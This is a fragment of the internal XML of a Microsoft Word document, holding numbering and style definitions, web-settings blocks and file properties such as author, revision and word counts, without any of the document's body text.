        <w:ind w:left="7133" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="97CC0C2A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8135" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="37D764AC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CD7E0E70"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="2"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="541" w:hanging="423"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="541" w:hanging="423"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:b/>
        <w:bCs/>
        <w:w w:val="100"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="839"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06" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3940" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4973" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6006" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8073" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="493B1B95"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B518F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EE3378"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="853A7EC4"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="2"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1192" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="3"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1192" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1192" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
        <w:b/>
        <w:bCs/>
        <w:w w:val="99"/>
        <w:sz w:val="26"/>
        <w:szCs w:val="26"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3882" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4776" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5670" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6564" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7458" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8352" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="545042C2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7D0CC618"/>
    <w:lvl w:ilvl="0" w:tplc="3A986688">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="839" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
        <w:w w:val="100"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="D3B6A2C6">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1770" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="F246F8FA">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2700" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="22882010">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3630" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="70D87B80">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4560" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="5768A932">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5490" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="6C542EAC">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6420" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="E09410F8">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7350" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="48AA0EB4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8280" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="74187DF5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F6FCD8F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15740518">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="557783651">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1038432626">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1100417653">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="425007346">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1109742328">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="705713939">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="477288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8D5"/>
    <w:rsid w:val="000B1D31"/>
    <w:rsid w:val="00161482"/>
    <w:rsid w:val="001E0F80"/>
    <w:rsid w:val="001E1782"/>
    <w:rsid w:val="00336E0D"/>
    <w:rsid w:val="003E376B"/>
    <w:rsid w:val="00445FE1"/>
    <w:rsid w:val="00736C51"/>
    <w:rsid w:val="007902BA"/>
    <w:rsid w:val="00927343"/>
    <w:rsid w:val="00A778D5"/>
    <w:rsid w:val="00AC7243"/>
    <w:rsid w:val="00B65A18"/>
    <w:rsid w:val="00C27E96"/>
    <w:rsid w:val="00C6408B"/>
    <w:rsid w:val="00F264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14462"/>
  <w15:docId w15:val="{3B13A7D2-71A7-4213-871D-61B921A3D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3"/>
      <w:ind w:left="1683"/>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839" w:hanging="361"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TableParagraph">
    <w:name w:val="Table Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:line="275" w:lineRule="exact"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="pw-post-body-paragraph">
    <w:name w:val="pw-post-body-paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="003E376B"/>
    <w:pPr>
      <w:widowControl/>
      <w:autoSpaceDE/>
      <w:autoSpaceDN/>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="lr">
    <w:name w:val="lr"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="003E376B"/>
    <w:pPr>
      <w:widowControl/>
      <w:autoSpaceDE/>
      <w:autoSpaceDN/>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="lq">
    <w:name w:val="lq"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="003E376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3E376B"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C6408B"/>
    <w:rPr>
      <w:color w:val="0000FF" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C640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52079">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="214510308">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="518396473">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="597060404">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="710306768">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="714086198">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1012269106">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1456949084">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1539660140">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1897203436">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1947035560">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2039623308">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2136025690">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="947347928">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="15"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="192111895">
              <w:marLeft w:val="210"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="195"/>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mailto:veeraboina.gnaneswar2020@vitbhopal.ac.i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33</Pages>
  <Words>4881</Words>
  <Characters>27828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 Kalekar</dc:creator>
  <cp:lastModifiedBy>veeraboina gnaneswar</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-07-02T11:57:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-07-18T12:20:00Z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Microsoft® Word 2021</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="LastSaved">
    <vt:filetime>2023-06-30T00:00:00Z</vt:filetime>
  </property>
</Properties>
</file>